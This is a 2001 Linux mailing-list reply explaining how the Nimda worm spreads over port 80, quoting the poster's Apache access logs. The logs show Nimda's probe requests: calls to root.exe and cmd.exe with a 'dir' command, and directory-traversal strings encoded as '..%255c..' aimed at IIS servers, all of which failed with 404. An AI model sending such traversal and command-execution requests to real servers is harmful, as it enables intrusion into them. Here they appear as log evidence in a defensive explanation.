+++ Yashpal Nagar [linux-india] <13/11/01 13:21 +0530>:
> > Fine ... didnt know hathway had that much sense, especially given there's
> > tons of nimda, open relays (iis, deadrat 6.x etc) on cablemodem networks.
> If i request them to open these ports, will they do it and what's the harm
> in opening that. How nimda etc spreads with 80 ?
Look at this - in my APACHE logs at that ... tons of it. If it finds
root.exe, cmd.exe then boom, you infected.
202.153.121.23 - - [19/Sep/2001:07:56:11 +0530] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 290 "-" "-"
202.153.121.23 - - [19/Sep/2001:07:56:12 +0530] "GET /MSADC/root.exe?/c+dir
HTTP/1.0" 404 288 "-" "-"
202.153.121.23 - - [19/Sep/2001:07:56:14 +0530] "GET
/c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
202.153.121.23 - - [19/Sep/2001:07:56:15 +0530] "GET
/d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 298 "-" "-"
202.153.121.23 - - [19/Sep/2001:07:56:17 +0530] "GET
/scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 312 "-" "-"
202.153.127.21 - - [19/Sep/2001:07:56:17 +0530] "GET /scripts/root.exe?/c+dir
HTTP/1.0" 404 290 "-" "-"
202.153.121.23 - - [19/Sep/2001:07:56:18 +0530] "GET
/_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir
HTTP/1.0" 404 329 "-" "-"
> > You could try that - but basically no point in doing something like that.
> will every request come from my apache on online server OR redirect of apache
> will be fetching each page from my gateway itself.
the request first has to go to the server ... and you have to work around the
port blocks first
-srs
_______________________________________________
linux-india-help mailing list
[EMAIL PROTECTED]
https://lists.sourceforge.net/lists/listinfo/linux-india-help
